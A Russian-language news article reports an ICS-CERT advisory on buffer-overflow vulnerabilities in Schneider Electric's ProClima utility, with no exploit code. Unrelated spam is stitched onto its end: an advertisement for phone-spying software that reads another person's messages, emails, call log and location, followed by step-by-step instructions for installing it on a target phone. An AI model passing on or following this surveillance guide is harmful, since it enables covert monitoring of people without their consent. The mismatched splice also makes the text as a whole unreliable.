Критические уязвимости найдены в Schneider Electric ProClima

019 Эксперты ICS-CERT в новом отчёте, опубликованном на собственном сайте, сообщают о ряде уязвимостей, которые были обнаружены в утилите ProClima. Данная программа используется в энергетической отрасли, для тонкой настройки различного оборудования и программных систем.

Если злоумышленник обнаружит эти ошибки, у него появится возможность запускать на целевой системе практически любой произвольный код. Это позволяет гипотетически полностью скомпрометировать систему, заставляя её выполнять требуемые действия.

Первые три уязвимости, коды которых можно посмотреть на сайте ICS-CERT, связаны с использованием ActiveX MetaDraw. Злоумышленнику достаточно создать целевой сайт, который будет вызывать переполнение web-буфера. Итогом станет падение защиты и возможность запуска любого программного кода в рамках этой системы. При этом все остальные рубежи зашиты пользовательской системы не имеют значения, поскольку брешь затрагивает очень узкоспециализированную область работы. Сам факт обнаружения такой неисправности можно считать случайностью.

Также две уязвимости взаимодействуют с Atx45.ocx, вызывая аналогичное переполнение буфера. Сотрудники ICS-CERT подчёркивают, что все эти ошибки могут использоваться не только хакерами, но и обычными пользователями. Не требуется обладать какими-то особыми техническими знаниями для подобного саботажа. Но на текущий момент времени никаких признаков того, что брешь кто-то пытался активно использовать, не обнаружено. Ошибка затрагивает исключительно ProClima 6.0.1 и более ранние версии данной программы, в ProClima 6.1.7 проблема была устранена. Разработчик рекомендует произвести полное удаление предыдущей версии перед тем, как скачать и поставить новое ПО.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.